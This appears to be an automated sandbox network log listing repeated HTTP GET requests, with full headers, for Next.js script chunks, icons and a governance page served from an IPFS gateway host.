Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3629-beffcb1d37e29d12.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4254-ac0dd33f5ae839d3.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4815-7cc90f45fe6229bd.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8019-7233b42ab9ef6fe6.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5315-ede49da3c729b6f5.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5599-221be466b9fcb06f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /favicon32.ico HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7604-eabb8e5b8018f878.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-c0d18763a38243f4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4284-bbf96c7bcf282a59.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/qfKi0l7EhUa_QqPERmaKb/_buildManifest.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/qfKi0l7EhUa_QqPERmaKb/_ssgManifest.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/qfKi0l7EhUa_QqPERmaKb/_middlewareManifest.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/index-5c55ce06141b7657.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /favicon32.ico HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /governance/ HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9421.b5ce6bd95a5baa0f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/503.5217c75933b76bbc.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /aave.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8806.6223602df2ea965f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2Range: bytes=278528-278528If-Range: "bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq"
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9072-51cf922cfdeaf6b4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2284-c8e8c4a9494b7235.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7091-73091706560db88e.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4609-45f4815a9c085248.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5559-6c8d46c115744018.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8806.6223602df2ea965f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2Range: bytes=278528-304310If-Range: "bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq"
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/governance-0757370cd87e1b88.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9421.b5ce6bd95a5baa0f.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/503.5217c75933b76bbc.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /aave.svg HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2284-c8e8c4a9494b7235.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9072-51cf922cfdeaf6b4.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7091-73091706560db88e.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9f96d65d-7b812644c8c0f1f1.js HTTP/1.1Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
